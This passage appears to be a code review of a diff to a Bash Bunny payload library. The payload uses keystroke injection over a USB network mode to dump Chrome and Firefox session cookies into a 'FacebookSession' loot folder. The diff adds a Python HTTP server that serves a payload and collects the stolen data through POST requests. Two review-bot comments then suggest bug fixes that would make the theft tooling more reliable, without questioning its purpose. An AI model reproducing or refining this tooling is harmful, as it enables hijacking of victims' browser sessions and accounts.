\$Bunny\\loot\\FacebookSession\\\$env:computername.txt -Q ENTER -Q DELAY 100 -Q STRING exit -Q ENTER -Q DELAY 2000 +LED R G B 100 +ATTACKMODE RNDIS_ETHERNET -sync -LED R B 200 +LED G 100 diff --git a/payloads/library/WindowsCookies/server.py b/payloads/library/WindowsCookies/server.py new file mode 100644 index 00000000..977bb6d9 --- /dev/null +++ b/payloads/library/WindowsCookies/server.py @@ -0,0 +1,33 @@ +#!/usr/bin/python +from os import curdir +from os.path import join as pjoin + +from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer +# from http.server import BaseHTTPRequestHandler, HTTPServer + +class StoreHandler(BaseHTTPRequestHandler): + store_path = pjoin("/root/udisk/loot/FacebookSession/", 'l') + get_path = pjoin(curdir, 'p') + + def do_GET(self): + if self.path == '/p': + with open(self.get_path) as fh: + self.send_response(200) + self.send_header('Content-type', 'text/plain') + self.end_headers() + self.wfile.write(fh.read().encode()) + + def do_POST(self): + if self.path == '/l': + length = self.headers['content-length'] + data = self.rfile.read(int(length)) + + with open(self.store_path, 'a') as fh: + fh.write(data.decode() + "\n") + + self.send_response(200) + + +server = HTTPServer(('', 8080), StoreHandler) +server.serve_forever() +
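Review bot: `DUCKY_LANG='fr'` goes from a commented-out example to an active setting in this hunk while the neighbouring `# QUACK SET_LANGUAGE gb` still points at gb, which reads as a machine-local setting committed by accident rather than a deliberate change; restore it as `#DUCKY_LANG='fr'` with a comment that the value is per-deployment. The header still says `Dumps the stored session cookies from Chrome browser` and the label above the single `Q STRING "powershell …"` line says `#Dump Chrome Cookies`, although the command triggers both the Chrome and the Firefox function since 4/6; both comments should say Chrome/Firefox. `./server.py &` is started with no check that it is running before the keystrokes go out; `sleep 1` is the only synchronisation, and a failed start leaves the host-side loop polling with nothing to talk to, so at least a comment noting that assumption is warranted.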
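Review bot: `HTTPServer(('', 8080), StoreHandler)` binds every interface of the device, so the `/l` endpoint appends any POST body it receives — from any network the device is attached to, not only the RNDIS link — into `/root/udisk/loot/FacebookSession/l`, with no upper bound on `content-length` and an unhandled exception inside the handler if the header is missing or non-numeric; bind to the address the payload uses, `HTTPServer(('172.16.64.1', 8080), StoreHandler)`, and validate and cap the length before `self.rfile.read`. `do_POST` calls `self.send_response(200)` without `self.end_headers()`, so the reply never closes its header block, and neither handler sends anything for paths other than `/p` and `/l`, leaving the client waiting; add `self.end_headers()` after the 200 and `self.send_error(404)` in the else branches. The file is Python 2 only (`BaseHTTPServer`) while the commented `http.server` import hints at a port; the `#!/usr/bin/python` shebang and a module docstring should say which interpreter is expected.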